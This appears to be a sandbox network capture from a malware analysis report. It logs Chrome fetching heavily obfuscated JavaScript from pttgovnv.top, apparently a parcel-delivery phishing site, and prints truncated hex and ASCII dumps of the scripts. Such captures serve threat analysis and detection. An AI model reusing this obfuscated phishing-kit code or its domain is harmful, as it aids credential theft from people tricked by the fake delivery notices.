          2024-09-01 22:25:17 UTC1367INData Raw: 37 36 63 66 27 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 33 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 35 30 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 37 29 2b 27 6b 46 47 79 6d 2e 63 73 73 27 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 63 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 31 29 2b 27 4a 78 4b 6e 57 2e 6a 73 27 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 65 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 32 63 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78
          Data Ascii: 76cf'+a16_0x1a0ab1(0x149),a16_0x1a0ab1(0x133)+a16_0x1a0ab1(0x150),a16_0x1a0ab1(0x147)+'kFGym.css',a16_0x1a0ab1(0x14c)+a16_0x1a0ab1(0x149),a16_0x1a0ab1(0x131)+'JxKnW.js',a16_0x1a0ab1(0x14e)+a16_0x1a0ab1(0x149),a16_0x1a0ab1(0x12c)+a16_0x1a0ab1(0x149),a16_0x
          2024-09-01 22:25:17 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          17192.168.2.449756172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:17 UTC532OUTGET /help/assets/c27b6911JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://pttgovnv.top
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: script
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:17 UTC753INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:17 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:44 GMT
          ETag: W/"764-18fc3d84e20"
          CF-Cache-Status: HIT
          Age: 37058
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z3yyQInJMEcqmJtPoNccuQA6wlKbizSy3RN5tkSIZ6VcfobrgkXpul5o7PB2wyiH43SnFyf8qp3BlAw7%2FMhIV2Kowq0YPDTd09vbtjD5B0Y2Tvl5lRSmZEHtSNlMytY%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ace249b642af-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:17 UTC616INData Raw: 37 36 34 0d 0a 66 75 6e 63 74 69 6f 6e 20 61 32 34 5f 30 78 35 33 34 36 28 5f 30 78 34 30 33 30 63 35 2c 5f 30 78 33 31 65 65 63 64 29 7b 63 6f 6e 73 74 20 5f 30 78 35 35 36 38 32 35 3d 61 32 34 5f 30 78 33 32 34 62 28 29 3b 72 65 74 75 72 6e 20 61 32 34 5f 30 78 35 33 34 36 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 62 30 64 65 37 2c 5f 30 78 63 65 30 63 62 32 29 7b 5f 30 78 33 62 30 64 65 37 3d 5f 30 78 33 62 30 64 65 37 2d 30 78 36 37 3b 6c 65 74 20 5f 30 78 33 32 34 62 64 62 3d 5f 30 78 35 35 36 38 32 35 5b 5f 30 78 33 62 30 64 65 37 5d 3b 72 65 74 75 72 6e 20 5f 30 78 33 32 34 62 64 62 3b 7d 2c 61 32 34 5f 30 78 35 33 34 36 28 5f 30 78 34 30 33 30 63 35 2c 5f 30 78 33 31 65 65 63 64 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 32 34 5f 30 78 33 32 34 62 28
          Data Ascii: 764function a24_0x5346(_0x4030c5,_0x31eecd){const _0x556825=a24_0x324b();return a24_0x5346=function(_0x3b0de7,_0xce0cb2){_0x3b0de7=_0x3b0de7-0x67;let _0x324bdb=_0x556825[_0x3b0de7];return _0x324bdb;},a24_0x5346(_0x4030c5,_0x31eecd);}function a24_0x324b(
          2024-09-01 22:25:17 UTC1283INData Raw: 32 39 30 37 66 66 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 34 62 32 63 39 63 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 62 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 37 32 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 37 36 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 64 29 29 2f 30 78 34 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 37 34 29 29 2f 30 78 35 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 39 29 29 2f 30 78 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 66 29 29 2f
          Data Ascii: 2907ff();while(!![]){try{const _0x4b2c9c=parseInt(_0x4680c9(0x6b))/0x1*(-parseInt(_0x4680c9(0x72))/0x2)+parseInt(_0x4680c9(0x76))/0x3+-parseInt(_0x4680c9(0x6d))/0x4*(parseInt(_0x4680c9(0x74))/0x5)+parseInt(_0x4680c9(0x69))/0x6*(-parseInt(_0x4680c9(0x6f))/
          2024-09-01 22:25:17 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          18192.168.2.449752104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:17 UTC364OUTGET /help/assets/37d8eb31JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:17 UTC756INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:17 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"cf70-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 34171
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oF949fG84kyrF5QcmAlJ3vwQU8syOAMBXxOQWV2tBuEfGLtNgDD4gJcNz9QXVIRdHtsX4j3CMVZS54Qtshpdd7%2FWy6gDIZ%2BddGcpHF0RXB47QWMq32ohHMA6jzyQuEY%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ace24faf42ee-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:17 UTC613INData Raw: 37 63 62 63 0d 0a 63 6f 6e 73 74 20 61 39 5f 30 78 31 33 64 30 32 33 3d 61 39 5f 30 78 33 36 34 37 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 63 30 66 34 63 2c 5f 30 78 35 62 34 66 37 65 29 7b 63 6f 6e 73 74 20 5f 30 78 31 38 63 30 65 33 3d 61 39 5f 30 78 33 36 34 37 2c 5f 30 78 33 35 64 30 39 63 3d 5f 30 78 31 63 30 66 34 63 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 61 38 30 38 39 35 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 66 62 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 31 32 65 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 31 39 63 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38
          Data Ascii: 7cbcconst a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c0f4c();while(!![]){try{const _0xa80895=-parseInt(_0x18c0e3(0xfb))/0x1*(parseInt(_0x18c0e3(0x12e))/0x2)+parseInt(_0x18c0e3(0x19c))/0x3+-parseInt(_0x18
          2024-09-01 22:25:17 UTC1369INData Raw: 78 33 35 64 30 39 63 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 39 5f 30 78 35 34 30 33 2c 30 78 35 61 36 32 36 29 29 3b 69 6d 70 6f 72 74 7b 73 20 61 73 20 61 39 5f 30 78 33 30 66 39 64 37 2c 75 20 61 73 20 61 39 5f 30 78 31 66 33 62 30 36 2c 78 20 61 73 20 61 39 5f 30 78 32 65 65 33 64 31 2c 72 20 61 73 20 61 39 5f 30 78 34 63 37 30 62 63 2c 6e 20 61 73 20 61 39 5f 30 78 38 30 33 61 35 62 2c 79 20 61 73 20 61 39 5f 30 78 33 65 36 30 61 34 2c 64 20 61 73 20 61 39 5f 30 78 32 35 35 63 63 33 2c 7a 20 61 73 20 61 39 5f 30 78 34 36 31 36 35 63 2c 41 20 61 73 20 61 39 5f 30 78 32 62 33 63 64 37 2c 61 20 61 73 20 61 39 5f 30 78 35 61 34 38 36 32 2c 77 20 61 73 20 61 39 5f 30 78 32 37 33 34 39 36 7d 66 72 6f 6d 27 2e 2f 69 6e 64 65 78 2d 66 35 34 35
          Data Ascii: x35d09c['shift']());}}}(a9_0x5403,0x5a626));import{s as a9_0x30f9d7,u as a9_0x1f3b06,x as a9_0x2ee3d1,r as a9_0x4c70bc,n as a9_0x803a5b,y as a9_0x3e60a4,d as a9_0x255cc3,z as a9_0x46165c,A as a9_0x2b3cd7,a as a9_0x5a4862,w as a9_0x273496}from'./index-f545
          2024-09-01 22:25:17 UTC1369INData Raw: 39 36 63 64 37 28 5f 30 78 35 63 62 37 36 38 29 29 2c 5f 30 78 35 34 66 38 35 64 3e 2d 30 78 31 26 26 28 5f 30 78 35 36 66 30 33 30 3d 5f 30 78 35 36 66 30 33 30 7c 7c 5f 30 78 32 33 36 64 35 35 5b 5f 30 78 34 38 39 66 32 63 28 30 78 31 31 31 29 5d 28 30 78 30 2c 5f 30 78 35 34 66 38 35 64 29 2c 5f 30 78 35 62 38 37 62 32 3d 5f 30 78 32 33 36 64 35 35 5b 27 73 6c 69 63 65 27 5d 28 5f 30 78 35 34 66 38 35 64 2c 5f 30 78 32 33 36 64 35 35 5b 5f 30 78 34 38 39 66 32 63 28 30 78 31 33 30 29 5d 29 29 2c 5f 30 78 35 36 66 30 33 30 3d 61 74 28 5f 30 78 35 36 66 30 33 30 21 3d 6e 75 6c 6c 3f 5f 30 78 35 36 66 30 33 30 3a 5f 30 78 32 33 36 64 35 35 2c 5f 30 78 35 33 61 32 36 66 29 2c 7b 27 66 75 6c 6c 50 61 74 68 27 3a 5f 30 78 35 36 66 30 33 30 2b 28 5f 30 78 35
          Data Ascii: 96cd7(_0x5cb768)),_0x54f85d>-0x1&&(_0x56f030=_0x56f030||_0x236d55[_0x489f2c(0x111)](0x0,_0x54f85d),_0x5b87b2=_0x236d55['slice'](_0x54f85d,_0x236d55[_0x489f2c(0x130)])),_0x56f030=at(_0x56f030!=null?_0x56f030:_0x236d55,_0x53a26f),{'fullPath':_0x56f030+(_0x5
          2024-09-01 22:25:17 UTC1369INData Raw: 28 21 69 74 28 5f 30 78 31 63 66 39 37 37 5b 5f 30 78 35 63 34 65 37 38 5d 2c 5f 30 78 31 30 31 34 38 63 5b 5f 30 78 35 63 34 65 37 38 5d 29 29 72 65 74 75 72 6e 21 30 78 31 3b 72 65 74 75 72 6e 21 30 78 30 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 39 5f 30 78 35 34 30 33 28 29 7b 63 6f 6e 73 74 20 5f 30 78 34 30 33 66 64 33 3d 5b 27 6d 65 73 73 61 67 65 27 2c 27 61 63 6b 73 27 2c 27 6c 69 73 74 65 6e 27 2c 27 69 6e 63 6c 75 64 65 73 27 2c 27 43 6c 61 73 73 27 2c 27 32 35 32 34 39 32 33 67 46 79 50 65 41 27 2c 27 62 69 6e 64 27 2c 27 73 68 69 66 74 4b 65 79 27 2c 27 65 72 74 69 65 73 27 2c 27 73 74 61 74 65 27 2c 27 63 75 72 72 65 6e 74 54 61 72 27 2c 27 70 6f 73 69 74 69 6f 6e 27 2c 27 62 65 66 6f 72 65 52 6f 75 74 27 2c 27 2e 5c 78 32 30 65 67 3a 5c 78 32 30
          Data Ascii: (!it(_0x1cf977[_0x5c4e78],_0x10148c[_0x5c4e78]))return!0x1;return!0x0;}function a9_0x5403(){const _0x403fd3=['message','acks','listen','includes','Class','2524923gFyPeA','bind','shiftKey','erties','state','currentTar','position','beforeRout','.\x20eg:\x20
          2024-09-01 22:25:17 UTC1369INData Raw: 74 73 27 2c 27 74 68 5c 78 32 30 5c 78 32 32 27 2c 27 28 3f 3a 2f 7c 24 29 27 2c 27 73 65 61 72 63 68 27 2c 27 24 72 6f 75 74 65 27 2c 27 65 73 6f 6c 76 65 5c 78 32 30 63 6f 6d 27 2c 27 5c 78 32 32 5c 78 32 30 28 27 2c 27 6c 69 73 74 27 2c 27 74 6f 72 27 2c 27 73 70 6c 69 63 65 27 2c 27 61 6c 69 61 73 27 2c 27 69 6e 73 74 61 6e 63 65 73 27 2c 27 66 75 6e 63 74 69 6f 6e 27 2c 27 6f 72 61 74 69 6f 6e 27 2c 27 75 6e 73 68 69 66 74 27 2c 27 5b 5e 2f 5d 2b 3f 27 2c 27 64 75 70 6c 69 63 61 74 65 64 27 2c 27 6e 61 76 69 67 61 74 65 27 2c 27 73 70 6c 69 74 27 2c 27 69 73 45 78 61 63 74 41 63 74 27 2c 27 6d 61 6e 75 61 6c 27 2c 27 65 6e 74 65 72 43 61 6c 6c 62 27 2c 27 5f 5f 76 63 63 4f 70 74 73 27 2c 27 73 69 7a 65 27 2c 27 61 75 6c 74 27 2c 27 72 65 70 6c 61 63
          Data Ascii: ts','th\x20\x22','(?:/|$)','search','$route','esolve\x20com','\x22\x20(','list','tor','splice','alias','instances','function','oration','unshift','[^/]+?','duplicated','navigate','split','isExactAct','manual','enterCallb','__vccOpts','size','ault','replac
          2024-09-01 22:25:17 UTC1369INData Raw: 74 75 72 6e 20 4e 28 5f 30 78 34 31 39 33 33 61 29 3f 5f 30 78 34 35 61 65 61 34 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 33 30 29 5d 3d 3d 3d 5f 30 78 34 31 39 33 33 61 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 33 30 29 5d 26 26 5f 30 78 34 35 61 65 61 34 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 39 32 29 5d 28 28 5f 30 78 31 63 64 36 66 63 2c 5f 30 78 31 61 32 35 64 37 29 3d 3e 5f 30 78 31 63 64 36 66 63 3d 3d 3d 5f 30 78 34 31 39 33 33 61 5b 5f 30 78 31 61 32 35 64 37 5d 29 3a 5f 30 78 34 35 61 65 61 34 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 33 30 29 5d 3d 3d 3d 30 78 31 26 26 5f 30 78 34 35 61 65 61 34 5b 30 78 30 5d 3d 3d 3d 5f 30 78 34 31 39 33 33 61 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 74 28 5f 30 78 33 35 37 62 30 30 2c 5f 30 78 33 61 36 66 39
          Data Ascii: turn N(_0x41933a)?_0x45aea4[_0x136d46(0x130)]===_0x41933a[_0x136d46(0x130)]&&_0x45aea4[_0x136d46(0x192)]((_0x1cd6fc,_0x1a25d7)=>_0x1cd6fc===_0x41933a[_0x1a25d7]):_0x45aea4[_0x136d46(0x130)]===0x1&&_0x45aea4[0x0]===_0x41933a;}function at(_0x357b00,_0x3a6f9
          2024-09-01 22:25:17 UTC1369INData Raw: 31 63 39 29 2b 27 72 27 5d 28 5f 30 78 61 35 61 32 66 37 29 5b 5f 30 78 35 61 62 38 37 31 28 30 78 31 35 33 29 5d 28 27 28 28 28 2e 2b 29 2b 29 2b 29 27 2b 27 2b 24 27 29 3b 7d 29 3b 5f 30 78 61 35 61 32 66 37 28 29 2c 28 5f 30 78 31 36 37 66 39 33 5b 27 70 6f 70 27 5d 3d 5f 30 78 36 34 66 35 36 64 28 30 78 31 37 66 29 2c 5f 30 78 31 36 37 66 39 33 5b 5f 30 78 36 34 66 35 36 64 28 30 78 31 37 35 29 5d 3d 27 70 75 73 68 27 29 3b 7d 28 59 7c 7c 28 59 3d 7b 7d 29 29 29 3b 76 61 72 20 5a 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 31 61 33 64 63 29 7b 63 6f 6e 73 74 20 5f 30 78 62 37 31 61 39 36 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 5f 30 78 32 31 61 33 64 63 5b 5f 30 78 62 37 31 61 39 36 28 30 78 31 39 34 29 5d 3d 5f 30 78 62 37 31 61 39 36 28 30 78 31 39
          Data Ascii: 1c9)+'r'](_0xa5a2f7)[_0x5ab871(0x153)]('(((.+)+)+)'+'+$');});_0xa5a2f7(),(_0x167f93['pop']=_0x64f56d(0x17f),_0x167f93[_0x64f56d(0x175)]='push');}(Y||(Y={})));var Z;(function(_0x21a3dc){const _0xb71a96=a9_0x13d023;_0x21a3dc[_0xb71a96(0x194)]=_0xb71a96(0x19
          2024-09-01 22:25:17 UTC1369INData Raw: 61 39 5f 30 78 31 33 64 30 32 33 3b 6c 65 74 20 5f 30 78 34 31 35 62 65 32 3b 69 66 28 27 65 6c 27 69 6e 20 5f 30 78 34 37 35 34 65 34 29 7b 63 6f 6e 73 74 20 5f 30 78 34 35 39 39 62 62 3d 5f 30 78 34 37 35 34 65 34 5b 27 65 6c 27 5d 2c 5f 30 78 32 34 38 36 36 64 3d 74 79 70 65 6f 66 20 5f 30 78 34 35 39 39 62 62 3d 3d 5f 30 78 35 35 62 64 61 32 28 30 78 31 33 38 29 26 26 5f 30 78 34 35 39 39 62 62 5b 5f 30 78 35 35 62 64 61 32 28 30 78 66 30 29 5d 28 27 23 27 29 2c 5f 30 78 33 61 39 30 37 39 3d 74 79 70 65 6f 66 20 5f 30 78 34 35 39 39 62 62 3d 3d 27 73 74 72 69 6e 67 27 3f 5f 30 78 32 34 38 36 36 64 3f 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 35 62 64 61 32 28 30 78 31 34 65 29 2b 5f 30 78 35 35 62 64 61 32 28 30 78 31 31 63 29 5d 28 5f 30 78 34 35 39 39
          Data Ascii: a9_0x13d023;let _0x415be2;if('el'in _0x4754e4){const _0x4599bb=_0x4754e4['el'],_0x24866d=typeof _0x4599bb==_0x55bda2(0x138)&&_0x4599bb[_0x55bda2(0xf0)]('#'),_0x3a9079=typeof _0x4599bb=='string'?_0x24866d?document[_0x55bda2(0x14e)+_0x55bda2(0x11c)](_0x4599
          2024-09-01 22:25:17 UTC1369INData Raw: 5d 28 5f 30 78 33 62 34 62 30 37 29 2c 5f 30 78 35 35 31 39 38 38 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 38 39 30 65 38 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 63 38 34 62 34 28 5f 30 78 32 66 63 32 31 66 2c 5f 30 78 32 35 64 62 61 64 2c 7b 64 69 72 65 63 74 69 6f 6e 3a 5f 30 78 35 64 64 30 30 38 2c 64 65 6c 74 61 3a 5f 30 78 33 66 35 33 31 34 7d 29 7b 63 6f 6e 73 74 20 5f 30 78 35 62 31 32 66 35 3d 61 39 5f 30 78 33 36 34 37 2c 5f 30 78 33 61 63 33 65 62 3d 7b 27 64 69 72 65 63 74 69 6f 6e 27 3a 5f 30 78 35 64 64 30 30 38 2c 27 64 65 6c 74 61 27 3a 5f 30 78 33 66 35 33 31 34 2c 27 74 79 70 65 27 3a 59 5b 5f 30 78 35 62 31 32 66 35 28 30 78 31 37 66 29 5d 7d 3b 66 6f 72 28 63 6f 6e 73 74 20 5f 30 78 33 36 36 33 64 62 20 6f 66 20 5f 30 78 62 30 34
          Data Ascii: ](_0x3b4b07),_0x551988['push'](_0x3890e8);}function _0x3c84b4(_0x2fc21f,_0x25dbad,{direction:_0x5dd008,delta:_0x3f5314}){const _0x5b12f5=a9_0x3647,_0x3ac3eb={'direction':_0x5dd008,'delta':_0x3f5314,'type':Y[_0x5b12f5(0x17f)]};for(const _0x3663db of _0xb04
          2024-09-01 22:25:17 UTC1369INData Raw: 63 32 31 30 32 29 7b 63 6f 6e 73 74 20 5f 30 78 61 33 66 36 66 34 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 5f 30 78 35 63 32 31 30 32 3d 3d 5f 30 78 61 33 66 36 66 34 28 30 78 31 33 38 29 7c 7c 5f 30 78 35 63 32 31 30 32 26 26 74 79 70 65 6f 66 20 5f 30 78 35 63 32 31 30 32 3d 3d 5f 30 78 61 33 66 36 66 34 28 30 78 31 30 33 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 47 65 28 5f 30 78 66 62 37 38 35 39 29 7b 63 6f 6e 73 74 20 5f 30 78 35 61 32 65 33 32 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 5f 30 78 66 62 37 38 35 39 3d 3d 5f 30 78 35 61 32 65 33 32 28 30 78 31 33 38 29 7c 7c 74 79 70 65 6f 66 20 5f 30 78 66 62 37 38 35 39 3d 3d 5f 30 78 35 61 32 65 33 32 28 30 78 31 34 33 29 3b 7d
          Data Ascii: c2102){const _0xa3f6f4=a9_0x13d023;return typeof _0x5c2102==_0xa3f6f4(0x138)||_0x5c2102&&typeof _0x5c2102==_0xa3f6f4(0x103);}function Ge(_0xfb7859){const _0x5a2e32=a9_0x13d023;return typeof _0xfb7859==_0x5a2e32(0x138)||typeof _0xfb7859==_0x5a2e32(0x143);}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          19192.168.2.449757172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:17 UTC532OUTGET /help/assets/cbcdcea5JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://pttgovnv.top
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: script
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:17 UTC756INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:17 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:44 GMT
          ETag: W/"17d2-18fc3d84e20"
          CF-Cache-Status: HIT
          Age: 37058
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfKmfvFo0zAXNWulNLeI2YDSrnr3ruhCEXHbj8VQwFXH2yngzXiDZAzm2K8bvgTTROcfkPHU7Nc5TbZyOCtzg6koAYycRp%2BakC0mhoBNtI23OhSvlxqcigbZTZ%2BhPVY%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ace25e2d0f42-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:17 UTC613INData Raw: 31 37 64 32 0d 0a 63 6f 6e 73 74 20 61 32 36 5f 30 78 32 66 36 62 32 65 3d 61 32 36 5f 30 78 32 31 39 35 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 62 32 36 64 35 2c 5f 30 78 35 38 66 37 30 33 29 7b 63 6f 6e 73 74 20 5f 30 78 35 35 62 61 30 32 3d 61 32 36 5f 30 78 32 31 39 35 2c 5f 30 78 35 36 65 64 31 35 3d 5f 30 78 34 62 32 36 64 35 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 63 32 66 33 33 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 36 33 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 39 61 29 29 2f 30 78 32 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 36 30 29 29 2f 30 78 33 29 2b 70 61 72 73 65 49 6e 74 28 5f
          Data Ascii: 17d2const a26_0x2f6b2e=a26_0x2195;(function(_0x4b26d5,_0x58f703){const _0x55ba02=a26_0x2195,_0x56ed15=_0x4b26d5();while(!![]){try{const _0x1c2f33=-parseInt(_0x55ba02(0x163))/0x1+-parseInt(_0x55ba02(0x19a))/0x2*(parseInt(_0x55ba02(0x160))/0x3)+parseInt(_
          2024-09-01 22:25:17 UTC1369INData Raw: 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 31 61 63 66 39 39 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 64 33 32 31 39 2c 5f 30 78 32 30 32 37 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 32 34 61 35 30 35 3d 5f 30 78 31 61 63 66 39 39 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 32 34 38 63 66 38 3d 61 32 36 5f 30 78 32 31 39 35 3b 69 66 28 5f 30 78 32 30 32 37 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 36 32 36 65 34 32 3d 5f 30 78 32 30 32 37 63 33 5b 5f 30 78 32 34 38 63 66 38 28 30 78 31 38 65 29 5d 28 5f 30 78 32 64 33 32 31 39 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 32 30 32 37 63 33 3d 6e 75 6c 6c 2c 5f 30 78 36 32 36 65 34 32 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e
          Data Ascii: =(function(){let _0x1acf99=!![];return function(_0x2d3219,_0x2027c3){const _0x24a505=_0x1acf99?function(){const _0x248cf8=a26_0x2195;if(_0x2027c3){const _0x626e42=_0x2027c3[_0x248cf8(0x18e)](_0x2d3219,arguments);return _0x2027c3=null,_0x626e42;}}:function
          2024-09-01 22:25:17 UTC1369INData Raw: 27 2c 27 74 6f 53 74 72 69 6e 67 27 2c 27 6e 6f 74 69 63 65 4c 69 73 74 27 2c 27 37 32 34 37 36 53 58 42 43 6f 4a 27 2c 27 74 72 61 63 6b 54 69 74 6c 65 27 2c 27 5c 78 32 30 2a 64 61 74 65 2a 5c 78 32 30 5c 78 32 37 64 27 2c 27 59 6f 75 72 5c 78 32 30 70 61 63 6b 61 27 2c 27 6e 65 78 74 27 2c 27 61 74 65 5c 78 32 30 79 6f 75 72 5c 78 32 30 61 27 2c 27 44 65 6c 69 76 65 72 79 5c 78 32 30 46 27 2c 27 73 65 61 72 63 68 27 2c 27 50 61 6b 65 74 5c 78 32 30 4e 75 6d 61 27 2c 27 39 30 36 33 37 34 37 67 64 56 4a 59 42 27 2c 27 31 37 33 38 32 39 36 6b 66 66 66 4e 72 27 2c 27 75 6d 75 27 2c 27 5c 78 32 30 61 67 61 69 6e 5c 78 32 30 6f 6e 5c 78 32 30 27 2c 27 70 72 65 76 65 6e 74 27 2c 27 4c c3 bc 74 66 65 6e 5c 78 32 30 61 64 72 27 2c 27 72 65 64 27 2c 27 74 6f 4c
